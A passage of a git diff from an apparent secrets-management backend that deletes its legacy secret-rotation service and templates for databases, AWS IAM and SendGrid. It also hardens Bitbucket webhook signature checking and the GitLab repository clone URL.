lastCred = variables.creds.at(-1); - if (lastCred && variables.creds.length === 1) { - newCredential.internal.username = - lastCred.internal.username === variables.inputs.username1 - ? variables.inputs.username2 - : variables.inputs.username1; - } else { - newCredential.internal.username = lastCred ? lastCred.internal.username : variables.inputs.username1; - } - // set a random value for new password - newCredential.internal.rotated_password = alphaNumericNanoId(32); - const { admin_username: username, admin_password: password, host, database, port, ca } = newCredential.inputs; - - const options = - provider.template.client === TDbProviderClients.MsSqlServer - ? ({ - encrypt: appCfg.ENABLE_MSSQL_SECRET_ROTATION_ENCRYPT, - // when ca is provided use that - trustServerCertificate: !ca, - cryptoCredentialsDetails: ca ? { ca } : {} - } as Record) - : undefined; - - const dbFunctionArg = { - username, - password, - host, - database, - port, - ca: ca as string, - client: provider.template.client === TDbProviderClients.MySql ? "mysql2" : provider.template.client, - options - } as TSecretRotationDbFn; - - // set function - await secretRotationDbFn({ - ...dbFunctionArg, - ...getDbSetQuery(provider.template.client, { - password: newCredential.internal.rotated_password as string, - username: newCredential.internal.username as string - }) - }); - - // test function - const testQuery = - provider.template.client === TDbProviderClients.MsSqlServer ? 
"SELECT GETDATE()" : "SELECT NOW()"; - - await secretRotationDbFn({ - ...dbFunctionArg, - query: testQuery, - variables: [] - }); - - newCredential.outputs.db_username = newCredential.internal.username; - newCredential.outputs.db_password = newCredential.internal.rotated_password; - // clean up - if (variables.creds.length === 2) variables.creds.pop(); - } - - /* - * Rotation Function For AWS Services - * Due to complexity in AWS Authorization hashing signature process we keep it as seperate entity instead of http template mode - * We first delete old key before creating a new one because aws iam has a quota limit of 2 keys - * */ - if (provider.template.type === TProviderFunctionTypes.AWS) { - if (provider.template.client === TAwsProviderSystems.IAM) { - const client = new IAMClient({ - useFipsEndpoint: crypto.isFipsModeEnabled(), - sha256: CustomAWSHasher, - region: newCredential.inputs.manager_user_aws_region as string, - credentials: { - accessKeyId: newCredential.inputs.manager_user_access_key as string, - secretAccessKey: newCredential.inputs.manager_user_secret_key as string - } - }); - - const iamUserName = newCredential.inputs.iam_username as string; - - if (variables.creds.length === 2) { - const deleteCycleCredential = variables.creds.pop(); - if (deleteCycleCredential) { - const deletedIamAccessKey = await client.send( - new DeleteAccessKeyCommand({ - UserName: iamUserName, - AccessKeyId: deleteCycleCredential.outputs.iam_user_access_key as string - }) - ); - - if ( - !deletedIamAccessKey?.$metadata?.httpStatusCode || - deletedIamAccessKey?.$metadata?.httpStatusCode > 300 - ) { - throw new DisableRotationErrors({ - message: "Failed to delete aws iam access key. Check managed iam user policy" - }); - } - } - } - - const newIamAccessKey = await client.send(new CreateAccessKeyCommand({ UserName: iamUserName })); - if (!newIamAccessKey.AccessKey) - throw new DisableRotationErrors({ message: "Failed to create access key. 
Check managed iam user policy" }); - - // test - const testAccessKey = await client.send( - new GetAccessKeyLastUsedCommand({ AccessKeyId: newIamAccessKey.AccessKey.AccessKeyId }) - ); - if (testAccessKey?.UserName !== iamUserName) - throw new DisableRotationErrors({ message: "Failed to create access key. Check managed iam user policy" }); - - newCredential.outputs.iam_user_access_key = newIamAccessKey.AccessKey.AccessKeyId; - newCredential.outputs.iam_user_secret_key = newIamAccessKey.AccessKey.SecretAccessKey; - } - } - - /* Rotation function of HTTP infisical template - * This is a generic http based template system for rotation - * we use this for sendgrid and for custom secret rotation - * This will ensure user provided rotation is easier to make - * */ - if (provider.template.type === TProviderFunctionTypes.HTTP) { - if (provider.template.functions.set?.pre) { - secretRotationPreSetFn(provider.template.functions.set.pre, newCredential); - } - await secretRotationHttpSetFn(provider.template.functions.set, newCredential); - // now test - await secretRotationHttpFn(provider.template.functions.test, newCredential); - if (variables.creds.length === 2) { - const deleteCycleCred = variables.creds.pop(); - if (deleteCycleCred && provider.template.functions.remove) { - const deleteCycleVar = { inputs: variables.inputs, ...deleteCycleCred }; - await secretRotationHttpFn(provider.template.functions.remove, deleteCycleVar); - } - } - } - - // insert the new variables to start - // encrypt the data - save it - variables.creds.unshift({ - outputs: newCredential.outputs, - internal: newCredential.internal - }); - const encryptedRotationData = secretManagerEncryptor({ - plainText: Buffer.from(JSON.stringify(variables)) - }).cipherTextBlob; - - const numberOfSecretsRotated = rotationOutputs.length; - if (shouldUseSecretV2Bridge) { - const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({ - secretId, - value: - typeof newCredential.outputs[outputKey] 
=== "object" - ? JSON.stringify(newCredential.outputs[outputKey]) - : String(newCredential.outputs[outputKey]) - })); - // map the final values to output keys in the board - await secretRotationDAL.transaction(async (tx) => { - await secretRotationDAL.updateById( - rotationId, - { - encryptedRotationData, - lastRotatedAt: new Date(), - statusMessage: "Rotated successfull", - status: "success" - }, - tx - ); - const updatedSecrets = await secretV2BridgeDAL.bulkUpdate( - encryptedSecrets.map(({ secretId, value }) => ({ - // this secret id is validated when user is inserted - filter: { id: secretId, type: SecretType.Shared }, - data: { - encryptedValue: secretManagerEncryptor({ plainText: Buffer.from(value) }).cipherTextBlob - } - })), - tx - ); - const secretVersions = await secretVersionV2BridgeDAL.insertMany( - updatedSecrets.map(({ id, updatedAt, createdAt, ...el }) => ({ - ...el, - actorType: ActorType.PLATFORM, - secretId: id - })), - tx - ); - - await folderCommitService.createCommit( - { - actor: { - type: ActorType.PLATFORM - }, - message: "Changed by Secret rotation", - folderId: secretVersions[0].folderId, - changes: secretVersions.map((sv) => ({ - type: CommitType.ADD, - isUpdate: true, - secretVersionId: sv.id - })) - }, - tx - ); - await secretV2BridgeDAL.invalidateSecretCacheByProjectId(secretRotation.projectId, tx); - }); - } else { - if (!botKey) - throw new NotFoundError({ - message: `Project bot not found for project with ID '${secretRotation.projectId}'` - }); - - const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({ - secretId, - value: crypto - .encryption() - .symmetric() - .encrypt({ - plaintext: - typeof newCredential.outputs[outputKey] === "object" - ? 
JSON.stringify(newCredential.outputs[outputKey]) - : String(newCredential.outputs[outputKey]), - key: botKey, - keySize: SymmetricKeySize.Bits128 - }) - })); - - // map the final values to output keys in the board - await secretRotationDAL.transaction(async (tx) => { - await secretRotationDAL.updateById( - rotationId, - { - encryptedRotationData, - lastRotatedAt: new Date(), - statusMessage: "Rotated successfull", - status: "success" - }, - tx - ); - const updatedSecrets = await secretDAL.bulkUpdate( - encryptedSecrets.map(({ secretId, value }) => ({ - // this secret id is validated when user is inserted - filter: { id: secretId, type: SecretType.Shared }, - data: { - secretValueCiphertext: value.ciphertext, - secretValueIV: value.iv, - secretValueTag: value.tag - } - })), - tx - ); - await secretVersionDAL.insertMany( - updatedSecrets.map(({ id, updatedAt, createdAt, ...el }) => { - if (!el.secretBlindIndex) { - throw new NotFoundError({ message: `Secret blind index not found on secret with ID '${id}` }); - } - return { - ...el, - secretId: id, - secretBlindIndex: el.secretBlindIndex - }; - }), - tx - ); - }); - } - - await telemetryService.sendPostHogEvents({ - event: PostHogEventTypes.SecretRotated, - distinctId: "", - properties: { - numberOfSecrets: numberOfSecretsRotated, - environment: secretRotation.environment.slug, - secretPath: secretRotation.secretPath, - projectId: secretRotation.projectId - } - }); - - logger.info("Finished rotating: rotation id: ", rotationId); - } catch (error) { - logger.error(error, "Failed to execute secret rotation"); - if (error instanceof DisableRotationErrors) { - if (job.id) { - await queue.stopRepeatableJobByJobId(QueueName.SecretRotation, job.id); - } - } - - await secretRotationDAL.updateById(rotationId, { - status: "failed", - statusMessage: (error as Error).message.slice(0, 500), - lastRotatedAt: new Date() - }); - } - }); - - return { - addToQueue, - removeFromQueue - }; -}; diff --git 
a/backend/src/ee/services/secret-rotation/secret-rotation-service.ts b/backend/src/ee/services/secret-rotation/secret-rotation-service.ts deleted file mode 100644 index a093f879072..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-service.ts +++ /dev/null @@ -1,312 +0,0 @@ -import { ForbiddenError, subject } from "@casl/ability"; -import Ajv from "ajv"; - -import { ActionProjectType, ProjectVersion, TableName } from "@app/db/schemas"; -import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography"; -import { BadRequestError, NotFoundError } from "@app/lib/errors"; -import { TProjectPermission } from "@app/lib/types"; -import { TKmsServiceFactory } from "@app/services/kms/kms-service"; -import { KmsDataKey } from "@app/services/kms/kms-types"; -import { TProjectDALFactory } from "@app/services/project/project-dal"; -import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service"; -import { TSecretDALFactory } from "@app/services/secret/secret-dal"; -import { TSecretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal"; -import { TSecretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal"; - -import { TLicenseServiceFactory } from "../license/license-service"; -import { TPermissionServiceFactory } from "../permission/permission-service-types"; -import { - ProjectPermissionSecretActions, - ProjectPermissionSecretRotationActions, - ProjectPermissionSub -} from "../permission/project-permission"; -import { TSecretRotationDALFactory } from "./secret-rotation-dal"; -import { TSecretRotationQueueFactory } from "./secret-rotation-queue"; -import { TSecretRotationEncData } from "./secret-rotation-queue/secret-rotation-queue-types"; -import { TCreateSecretRotationDTO, TDeleteDTO, TListByProjectIdDTO, TRestartDTO } from "./secret-rotation-types"; -import { rotationTemplates } from "./templates"; - -type TSecretRotationServiceFactoryDep = { - secretRotationDAL: 
TSecretRotationDALFactory; - projectDAL: Pick; - folderDAL: Pick; - secretDAL: Pick; - secretV2BridgeDAL: Pick; - licenseService: Pick; - permissionService: Pick; - secretRotationQueue: TSecretRotationQueueFactory; - projectBotService: Pick; - kmsService: Pick; -}; - -export type TSecretRotationServiceFactory = ReturnType; - -const ajv = new Ajv({ strict: false }); -export const secretRotationServiceFactory = ({ - secretRotationDAL, - permissionService, - secretRotationQueue, - licenseService, - projectDAL, - folderDAL, - secretDAL, - projectBotService, - secretV2BridgeDAL, - kmsService -}: TSecretRotationServiceFactoryDep) => { - const getProviderTemplates = async ({ - actor, - actorId, - actorOrgId, - actorAuthMethod, - projectId - }: TProjectPermission) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - - return { - custom: [], - providers: rotationTemplates - }; - }; - - const createRotation = async ({ - projectId, - actorId, - actor, - actorOrgId, - actorAuthMethod, - inputs, - outputs, - interval, - provider, - secretPath, - environment - }: TCreateSecretRotationDTO) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - - const folder = await folderDAL.findBySecretPath(projectId, environment, secretPath); - if (!folder) { - throw new NotFoundError({ - message: `Secret path with path '${secretPath}' not found in environment with slug '${environment}'` - }); - } - 
ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretActions.Edit, - subject(ProjectPermissionSub.Secrets, { environment, secretPath }) - ); - - const project = await projectDAL.findById(projectId); - const shouldUseBridge = project.version === ProjectVersion.V3; - - if (shouldUseBridge) { - const selectedSecrets = await secretV2BridgeDAL.find({ - folderId: folder.id, - $in: { [`${TableName.SecretV2}.id` as "id"]: Object.values(outputs) } - }); - if (selectedSecrets.length !== Object.values(outputs).length) - throw new NotFoundError({ message: `Secrets not found in folder with ID '${folder.id}'` }); - const rotatedSecrets = selectedSecrets.filter(({ isRotatedSecret }) => isRotatedSecret); - if (rotatedSecrets.length) - throw new BadRequestError({ - message: `Selected secrets are already used for rotation: ${rotatedSecrets - .map((secret) => secret.key) - .join(", ")}` - }); - } else { - const selectedSecrets = await secretDAL.find({ - folderId: folder.id, - $in: { id: Object.values(outputs) } - }); - if (selectedSecrets.length !== Object.values(outputs).length) - throw new NotFoundError({ message: `Secrets not found in folder with ID '${folder.id}'` }); - } - - const plan = await licenseService.getPlan(project.orgId); - if (!plan.secretRotation) - throw new BadRequestError({ - message: "Failed to add secret rotation due to plan restriction. Upgrade plan to add secret rotation." 
- }); - - const selectedTemplate = rotationTemplates.find(({ name }) => name === provider); - if (!selectedTemplate) throw new NotFoundError({ message: `Provider with name '${provider}' not found` }); - const formattedInputs: Record = {}; - Object.entries(inputs).forEach(([key, value]) => { - const { type } = selectedTemplate.template.inputs.properties[key]; - if (type === "string") { - formattedInputs[key] = value; - return; - } - if (type === "integer") { - formattedInputs[key] = parseInt(value as string, 10); - return; - } - formattedInputs[key] = JSON.parse(value as string); - }); - // ensure input one follows the correct schema - const valid = ajv.validate(selectedTemplate.template.inputs, formattedInputs); - if (!valid) { - throw new BadRequestError({ message: ajv.errors?.[0].message }); - } - - const unencryptedData: Partial = { - inputs: formattedInputs, - creds: [] - }; - const { encryptor: secretManagerEncryptor } = await kmsService.createCipherPairWithDataKey({ - type: KmsDataKey.SecretManager, - projectId - }); - - const secretRotation = await secretRotationDAL.transaction(async (tx) => { - const doc = await secretRotationDAL.create( - { - provider, - secretPath, - interval, - envId: folder.envId, - encryptedRotationData: secretManagerEncryptor({ plainText: Buffer.from(JSON.stringify(unencryptedData)) }) - .cipherTextBlob - }, - tx - ); - let outputSecretMapping; - if (shouldUseBridge) { - outputSecretMapping = await secretRotationDAL.secretOutputV2InsertMany( - Object.entries(outputs).map(([key, secretId]) => ({ key, secretId, rotationId: doc.id })), - tx - ); - } else { - outputSecretMapping = await secretRotationDAL.secretOutputInsertMany( - Object.entries(outputs).map(([key, secretId]) => ({ key, secretId, rotationId: doc.id })), - tx - ); - } - return { ...doc, outputs: outputSecretMapping, environment: folder.environment }; - }); - await secretRotationQueue.addToQueue(); - return secretRotation; - }; - - const getByProjectId = async ({ actorId, 
projectId, actor, actorOrgId, actorAuthMethod }: TListByProjectIdDTO) => { - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Read, - ProjectPermissionSub.SecretRotation - ); - const { botKey, shouldUseSecretV2Bridge } = await projectBotService.getBotKey(projectId); - if (shouldUseSecretV2Bridge) { - const docs = await secretRotationDAL.findSecretV2({ projectId }); - return docs; - } - - if (!botKey) throw new NotFoundError({ message: `Project bot not found for project with ID '${projectId}'` }); - const docs = await secretRotationDAL.find({ projectId }); - - return docs.map((el) => ({ - ...el, - outputs: el.outputs.map((output) => ({ - ...output, - secret: { - id: output.secret.id, - version: output.secret.version, - secretKey: crypto.encryption().symmetric().decrypt({ - ciphertext: output.secret.secretKeyCiphertext, - iv: output.secret.secretKeyIV, - tag: output.secret.secretKeyTag, - key: botKey, - keySize: SymmetricKeySize.Bits128 - }) - } - })) - })); - }; - - const restartById = async ({ actor, actorId, actorOrgId, actorAuthMethod, rotationId }: TRestartDTO) => { - const doc = await secretRotationDAL.findById(rotationId); - if (!doc) throw new NotFoundError({ message: `Rotation with ID '${rotationId}' not found` }); - - const project = await projectDAL.findById(doc.projectId); - const plan = await licenseService.getPlan(project.orgId); - if (!plan.secretRotation) - throw new BadRequestError({ - message: "Failed to add secret rotation due to plan restriction. Upgrade plan to add secret rotation." 
- }); - - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId: project.id, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Edit, - ProjectPermissionSub.SecretRotation - ); - await secretRotationQueue.removeFromQueue(doc.id, doc.interval); - await secretRotationQueue.addToQueue(); - return doc; - }; - - const deleteById = async ({ actor, actorId, actorOrgId, actorAuthMethod, rotationId }: TDeleteDTO) => { - const doc = await secretRotationDAL.findById(rotationId); - if (!doc) throw new NotFoundError({ message: `Rotation with ID '${rotationId}' not found` }); - - const { permission } = await permissionService.getProjectPermission({ - actor, - actorId, - projectId: doc.projectId, - actorAuthMethod, - actorOrgId, - actionProjectType: ActionProjectType.SecretManager - }); - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionSecretRotationActions.Delete, - ProjectPermissionSub.SecretRotation - ); - const deletedDoc = await secretRotationDAL.transaction(async (tx) => { - const strat = await secretRotationDAL.deleteById(rotationId, tx); - return strat; - }); - await secretRotationQueue.removeFromQueue(deletedDoc.id, deletedDoc.interval); - return { ...doc, ...deletedDoc }; - }; - - return { - getProviderTemplates, - getByProjectId, - createRotation, - restartById, - deleteById - }; -}; diff --git a/backend/src/ee/services/secret-rotation/secret-rotation-types.ts b/backend/src/ee/services/secret-rotation/secret-rotation-types.ts deleted file mode 100644 index 990bf3ecaab..00000000000 --- a/backend/src/ee/services/secret-rotation/secret-rotation-types.ts +++ /dev/null @@ -1,20 +0,0 @@ -import { TProjectPermission } from "@app/lib/types"; - -export type TCreateSecretRotationDTO = { - secretPath: string; - environment: string; - interval: number; - provider: string; - inputs: 
Record; - outputs: Record; -} & TProjectPermission; - -export type TListByProjectIdDTO = TProjectPermission; - -export type TDeleteDTO = { - rotationId: string; -} & Omit; - -export type TRestartDTO = { - rotationId: string; -} & Omit; diff --git a/backend/src/ee/services/secret-rotation/templates/aws-iam.ts b/backend/src/ee/services/secret-rotation/templates/aws-iam.ts deleted file mode 100644 index d4506c26e91..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/aws-iam.ts +++ /dev/null @@ -1,21 +0,0 @@ -import { TAwsProviderSystems, TProviderFunctionTypes } from "./types"; - -export const AWS_IAM_TEMPLATE = { - type: TProviderFunctionTypes.AWS as const, - client: TAwsProviderSystems.IAM, - inputs: { - type: "object" as const, - properties: { - manager_user_access_key: { type: "string" as const }, - manager_user_secret_key: { type: "string" as const }, - manager_user_aws_region: { type: "string" as const }, - iam_username: { type: "string" as const } - }, - required: ["manager_user_access_key", "manager_user_secret_key", "manager_user_aws_region", "iam_username"], - additionalProperties: false - }, - outputs: { - iam_user_access_key: { type: "string" }, - iam_user_secret_key: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/index.ts b/backend/src/ee/services/secret-rotation/templates/index.ts deleted file mode 100644 index ce3ecd68724..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/index.ts +++ /dev/null @@ -1,46 +0,0 @@ -import { AWS_IAM_TEMPLATE } from "./aws-iam"; -import { MSSQL_TEMPLATE } from "./mssql"; -import { MYSQL_TEMPLATE } from "./mysql"; -import { POSTGRES_TEMPLATE } from "./postgres"; -import { SENDGRID_TEMPLATE } from "./sendgrid"; -import { TSecretRotationProviderTemplate } from "./types"; - -export const rotationTemplates: TSecretRotationProviderTemplate[] = [ - { - name: "sendgrid", - title: "Twilio Sendgrid", - image: "sendgrid.png", - description: "Rotate Twilio 
Sendgrid API keys", - template: SENDGRID_TEMPLATE - }, - { - name: "postgres", - title: "PostgreSQL", - image: "postgres.png", - description: "Rotate PostgreSQL/CockroachDB user credentials", - template: POSTGRES_TEMPLATE, - isDeprecated: true - }, - { - name: "mysql", - title: "MySQL", - image: "mysql.png", - description: "Rotate MySQL@7/MariaDB user credentials", - template: MYSQL_TEMPLATE - }, - { - name: "mssql", - title: "Microsoft SQL Server", - image: "mssqlserver.png", - description: "Rotate Microsoft SQL server user credentials", - template: MSSQL_TEMPLATE, - isDeprecated: true - }, - { - name: "aws-iam", - title: "AWS IAM", - image: "aws-iam.svg", - description: "Rotate AWS IAM User credentials", - template: AWS_IAM_TEMPLATE - } -]; diff --git a/backend/src/ee/services/secret-rotation/templates/mssql.ts b/backend/src/ee/services/secret-rotation/templates/mssql.ts deleted file mode 100644 index 30096590d9c..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/mssql.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const MSSQL_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.MsSqlServer, - inputs: { - type: "object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const, default: "master" }, - port: { type: "integer" as const, default: "1433" }, - username1: { - type: "string", - default: "infisical-sql-user1", - desc: "SQL Server login name that must be created at server level with a matching database user" - }, - username2: { - type: "string", - default: "infisical-sql-user2", - desc: "SQL Server login name that must be created at server level with a matching database user" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", 
"host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/mysql.ts b/backend/src/ee/services/secret-rotation/templates/mysql.ts deleted file mode 100644 index 723560a3e8b..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/mysql.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const MYSQL_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.MySql, - inputs: { - type: "object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const }, - port: { type: "integer" as const, default: "3306" }, - username1: { - type: "string", - default: "infisical-sql-user1", - desc: "This user must be created in your database" - }, - username2: { - type: "string", - default: "infisical-sql-user2", - desc: "This user must be created in your database" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", "host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/postgres.ts b/backend/src/ee/services/secret-rotation/templates/postgres.ts deleted file mode 100644 index c894631cb28..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/postgres.ts +++ /dev/null @@ -1,33 +0,0 @@ -import { TDbProviderClients, TProviderFunctionTypes } from "./types"; - -export const POSTGRES_TEMPLATE = { - type: TProviderFunctionTypes.DB as const, - client: TDbProviderClients.Pg as const, - inputs: { - type: 
"object" as const, - properties: { - admin_username: { type: "string" as const }, - admin_password: { type: "string" as const }, - host: { type: "string" as const }, - database: { type: "string" as const }, - port: { type: "integer" as const, default: "5432" }, - username1: { - type: "string", - default: "infisical-pg-user1", - desc: "This user must be created in your database" - }, - username2: { - type: "string", - default: "infisical-pg-user2", - desc: "This user must be created in your database" - }, - ca: { type: "string", desc: "SSL certificate for db auth(string)" } - }, - required: ["admin_username", "admin_password", "host", "database", "username1", "username2", "port"], - additionalProperties: false - }, - outputs: { - db_username: { type: "string" }, - db_password: { type: "string" } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/sendgrid.ts b/backend/src/ee/services/secret-rotation/templates/sendgrid.ts deleted file mode 100644 index bfdda7606ce..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/sendgrid.ts +++ /dev/null @@ -1,62 +0,0 @@ -/* eslint-disable no-template-curly-in-string */ -import { TAssignOp, TProviderFunctionTypes } from "./types"; - -export const SENDGRID_TEMPLATE = { - type: TProviderFunctionTypes.HTTP as const, - inputs: { - type: "object" as const, - properties: { - admin_api_key: { type: "string" as const, desc: "Sendgrid admin api key to create new keys" }, - api_key_scopes: { - type: "array", - items: { type: "string" as const }, - desc: "Scopes for created tokens by rotation(Array)" - } - }, - required: ["admin_api_key", "api_key_scopes"], - additionalProperties: false - }, - outputs: { - api_key: { type: "string" } - }, - internal: { - api_key_id: { type: "string" } - }, - functions: { - set: { - url: "https://api.sendgrid.com/v3/api_keys", - method: "POST", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - body: { - name: "infisical-${random | 16}", - scopes: { ref: 
"inputs.api_key_scopes" } - }, - setter: { - "outputs.api_key": { - assign: TAssignOp.JmesPath as const, - path: "api_key" - }, - "internal.api_key_id": { - assign: TAssignOp.JmesPath as const, - path: "api_key_id" - } - } - }, - remove: { - url: "https://api.sendgrid.com/v3/api_keys/${internal.api_key_id}", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - method: "DELETE" - }, - test: { - url: "https://api.sendgrid.com/v3/api_keys/${internal.api_key_id}", - header: { - Authorization: "Bearer ${inputs.admin_api_key}" - }, - method: "GET" - } - } -}; diff --git a/backend/src/ee/services/secret-rotation/templates/types.ts b/backend/src/ee/services/secret-rotation/templates/types.ts deleted file mode 100644 index e2ad8384fe9..00000000000 --- a/backend/src/ee/services/secret-rotation/templates/types.ts +++ /dev/null @@ -1,92 +0,0 @@ -export enum TProviderFunctionTypes { - HTTP = "http", - DB = "database", - AWS = "aws" -} - -export enum TDbProviderClients { - // postgres, cockroack db, amazon red shift - Pg = "pg", - // mysql and maria db - MySql = "mysql", - - MsSqlServer = "mssql", - OracleDB = "oracledb" -} - -export enum TAwsProviderSystems { - IAM = "iam" -} - -export enum TAssignOp { - Direct = "direct", - JmesPath = "jmesopath" -} - -export type TJmesPathAssignOp = { - assign: TAssignOp.JmesPath; - path: string; -}; - -export type TDirectAssignOp = { - assign: TAssignOp.Direct; - value: string; -}; - -export type TAssignFunction = TJmesPathAssignOp | TDirectAssignOp; - -export type THttpProviderFunction = { - url: string; - method: string; - header?: Record; - query?: Record; - body?: Record; - setter?: Record; - pre?: Record; -}; - -export type TSecretRotationProviderTemplate = { - name: string; - title: string; - image?: string; - description?: string; - template: THttpProviderTemplate | TDbProviderTemplate | TAwsProviderTemplate; - isDeprecated?: boolean; -}; - -export type THttpProviderTemplate = { - type: TProviderFunctionTypes.HTTP; - 
inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; - functions: { - set: THttpProviderFunction; - remove?: THttpProviderFunction; - test: THttpProviderFunction; - }; -}; - -export type TDbProviderTemplate = { - type: TProviderFunctionTypes.DB; - client: TDbProviderClients; - inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; -}; - -export type TAwsProviderTemplate = { - type: TProviderFunctionTypes.AWS; - client: TAwsProviderSystems; - inputs: { - type: "object"; - properties: Record; - required?: string[]; - }; - outputs: Record; -}; diff --git a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts index 258fb8ac0e8..b1ec152b4b9 100644 --- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts +++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts @@ -70,7 +70,14 @@ export const bitbucketSecretScanningService = ( hmac.update(bodyString); const calculatedSignature = hmac.digest("hex"); - if (calculatedSignature !== receivedSignature) { + const calculatedSignatureBuf = Buffer.from(calculatedSignature, "hex"); + const receivedSignatureBuf = Buffer.from(receivedSignature, "hex"); + + const isValid = + calculatedSignatureBuf.byteLength === receivedSignatureBuf.byteLength && + crypto.nativeCrypto.timingSafeEqual(calculatedSignatureBuf, receivedSignatureBuf); + + if (!isValid) { logger.error( `secretScanningV2PushEvent: Bitbucket - Invalid signature for webhook [dataSourceId=${dataSource.id}] [workspaceUuid=${repository.workspace.uuid}]` ); diff --git a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts index a18359073b2..13c22d40303 100644 --- 
a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts +++ b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-factory.ts @@ -42,18 +42,6 @@ import { TQueueGitLabResourceDiffScan } from "./gitlab-secret-scanning-types"; -const getMainDomain = (instanceUrl: string) => { - const url = new URL(instanceUrl); - const { hostname } = url; - const parts = hostname.split("."); - - if (parts.length >= 2) { - return parts.slice(-2).join("."); - } - - return hostname; -}; - export const GitLabSecretScanningFactory = ({ appConnectionDAL, kmsService }: TSecretScanningFactoryParams) => { const initialize: TSecretScanningFactoryInitialize< TGitLabDataSourceInput, @@ -272,8 +260,10 @@ export const GitLabSecretScanningFactory = ({ appConnectionDAL, kmsService }: TS throw new Error("Invalid GitLab project name"); } + const validatedHostname = new URL(instanceUrl).host; + await cloneRepository({ - cloneUrl: `https://${user.username}:${connection.credentials.accessToken}@${getMainDomain(instanceUrl)}/${resourceName}.git`, + cloneUrl: `https://${user.username}:${connection.credentials.accessToken}@${validatedHostname}/${resourceName}.git`, repoPath }); diff --git a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts index bc669a2f5b0..1d7d13850c3 100644 --- a/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts +++ b/backend/src/ee/services/secret-scanning-v2/gitlab/gitlab-secret-scanning-service.ts @@ -2,6 +2,7 @@ import { GitLabDataSourceScope } from "@app/ee/services/secret-scanning-v2/gitla import { TSecretScanningV2DALFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-dal"; import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums"; import { TSecretScanningV2QueueServiceFactory } from 
